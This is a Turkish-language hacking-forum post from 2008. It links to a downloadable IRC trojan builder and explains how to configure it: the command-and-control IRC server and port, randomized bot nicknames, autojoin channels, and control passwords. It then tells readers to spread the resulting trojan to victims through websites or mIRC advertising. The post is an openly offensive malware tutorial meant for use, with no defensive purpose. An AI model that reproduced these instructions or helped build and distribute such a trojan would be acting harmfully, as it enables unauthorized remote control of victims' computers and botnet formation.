CyberHackTeam
Would you like to react to this message? Create an account in a few clicks or log in to continue.

¢увєянα¢ктєαм нα¢кιηg ѕє¢υяιту ρяσƒєѕуöηєℓ нα¢к

AnasayfaPortalliAramaLatest imagesKayıt OlGiriş yap

Irc Trojen

YazarMesaj
BLacK
SySTeM RooT
SySTeM RooT
BLacK

İş/HobiLeR : BiLGiSaYaR
Lakap : BLacK

Irc Trojen Empty
MesajKonu: Irc Trojen   Irc Trojen Icon_minitimeC.tesi Nis. 12 2008, 12:09

http://underfloat.no.sapo.pt/Irccontact3.zip
Programını kullanarak Trojen yapabilirsiniz kısaca anlatacak olursam.

Programi yükledikten sonra IrcCfg adindaki uygulamayi calistiryorsunuz karsiniza clonun baglanti ayarlarinin bulundugu menü cikiyor.

iLk olarak open butonuna tikliyarak programin bulundugu dosyadan IRCcontact.exe´yi secip programin icine yukluyorsunuz daha donra ise sirasiyla alt kisimda belirttiklerimi yapiyorsunuz :

: Server Setting :
Irc Server :Bu kisima trojanin baglanmasini istediginiz server adresini yaziyorsunuz( örnek: irc.yukle.net )
Port : Serverin baglanti portunu giriyorsunuz (örnek:6667)

: Register Identify &l92;&l92; NickName :
Bu kisim ayni kalsin dokunmayin !

: Whois Info :
Nick Name :RANDOM
Name :RANDOM
Ident :RANDOM
Bu kisim yukardaki gibi kalacak yani oynama yapmayin cunku program clone ve exelerin nick,name ve identini kendi otomatik ayarlicak.Eger siz yok ben programin ayarlamasini istemiyorum kendim ayarlamak istiyorum diyorsaniz ozaman koymak istediginiz bolumleri degisin fakat bu durumda yapmis oldugunuz trojan ayni nickle baglanir ve server o nickl bagli olan bir kisi yada trojan varsa calismaz yani boyle bir sey yaparsaniz tek tek 1 den fazla trojan olusturum her kisiye ayri ayri yollamak zorunda kalirsiniz bunu tavsiye etmiyorum zaten trojan baglandiktan sonra nick de dail olmak uzere bilgileri degisebiliyorsunuz.

: Misc :
Runtime Pathname : Bu kisima trojan kicklendikten sonra yada banladiktan sonra kanala tekrar girmek saglamak icin buraya girmesini istediginiz kanallari yazin yada istemiyorsaniz Pathname olarak birakin (örnek:ltrabzon, lankara ,).

: Autojoin Channels :
Channels : Bu kisima serverda trojanin girecegi kanallari yaziyorsunuz.Kanallara sifra koymussaniz lkanalismi key , seklinde kanalinizi ve keyinizi girin normal kanal ise ltrabzon, lankara, lzurna, seklinde yazin.
Not : Virgülleme isaretlerine dikkat edin !

: Password to Login(No Spaces) :
User Password : Bu kisme botlari kullanacagiz sifreyi yazin
Master Password : Ayni sekilde bu kismada master passwordunu yazin yalniz iki sifrenin farkli olmasi gerekiyor burdaki sifreniz farkli olsun.

Son olarak ayarlarinizi Save Setting tusuna basarak kaydedin ve Trojaniniz hazir.Program dosyasinin icindeki IRCcontact.exe artik sizin serveriniz icin ayarlanmis ve kontrolu sizde olan bir trojan haline gelmistir.Bundan sonra yapmaniz gerekn trojani yaymanizdir bunun icinde web sitesi yada mirc reklam yolunu kullanabilirsiniz
http://www.cyberhack.nstars.org

Irc Trojen
1 sayfadaki 1 sayfası
 Similar topics
-
» HACKErKING_BY_KUs trojen yap
» ALIN SIZE TROJEN PROGRAMI BAKALIM BEYENCEKMSINIZ